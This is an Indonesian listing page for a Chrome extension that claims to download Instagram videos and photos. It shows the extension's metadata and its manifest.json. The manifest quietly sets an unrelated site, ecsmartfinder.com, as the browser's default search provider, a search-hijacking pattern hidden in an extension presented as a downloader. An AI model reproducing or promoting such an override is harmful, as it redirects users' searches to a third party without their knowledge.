Video & Photo Downloader For IG

Instagram Video & Photo Downloader - Download videos & Photos directly from Instagram in HD quality with one simple click.

Apa itu Video & Photo Downloader For IG?

Video & Photo Downloader For IG adalah ekstensi Chrome yang dikembangkan oleh igvidsdownload, dan fitur utamanya adalah "Instagram Video & Photo Downloader - Download videos & Photos directly from Instagram in HD quality with one simple click.".

Screenshot Ekstensi

screenshot
screenshot

Unduh Berkas CRX Ekstensi Video & Photo Downloader For IG

Unduh file ekstensi Video & Photo Downloader For IG dalam format crx, pasang ekstensi Chrome secara manual di peramban, atau bagikan file crx dengan teman untuk menginstal ekstensi Chrome dengan mudah.

Petunjuk Penggunaan Ekstensi

                                            

Informasi Dasar Ekstensi

Nama Video & Photo Downloader For IG Video & Photo Downloader For IG
ID kggfegclemhiainkddbhhgobheohnjha
URL Resmi https://chrome.google.com/webstore/detail/video-photo-downloader-fo/kggfegclemhiainkddbhhgobheohnjha
Deskripsi Instagram Video & Photo Downloader - Download videos & Photos directly from Instagram in HD quality with one simple click.
Ukuran File 175 KB
Jumlah Instalasi 36,063
Versi Saat Ini 0.0.6
Terakhir Diperbarui 2022-06-16
Tanggal Publikasi 2021-05-09
Penilaian 3.04/5 Total 108 Penilaian
Pengembang igvidsdownload
Email [email protected]
Tipe Pembayaran free
Bahasa yang Didukung en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "version": "0.0.6",
    "manifest_version": 3,
    "name": "Video & Photo Downloader For IG",
    "description": "Instagram Video & Photo Downloader - Download videos & Photos directly from Instagram in HD quality with one simple click.",
    "icons": {
        "32": "icons\/icon32.png",
        "64": "icons\/icon64.png",
        "96": "icons\/icon96.png",
        "128": "icons\/icon128.png",
        "164": "icons\/icon164.png",
        "256": "icons\/icon256.png",
        "512": "icons\/icon512.png"
    },
    "content_scripts": [
        {
            "all_frames": true,
            "css": [
                "css\/style.css"
            ],
            "js": [
                "js\/jquery.min.js",
                "js\/content.js"
            ],
            "matches": [
                "*:\/\/*.instagram.com\/*"
            ],
            "run_at": "document_end"
        }
    ],
    "background": {
        "service_worker": "background.js"
    },
    "permissions": [
        "downloads"
    ],
    "web_accessible_resources": [
        {
            "resources": [
                "\/icons\/*"
            ],
            "matches": [
                "*:\/\/*.instagram.com\/*"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/ecsmartfinder.com?n=430&q={searchTerms}",
            "favicon_url": "https:\/\/ecsmartfinder.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    }
}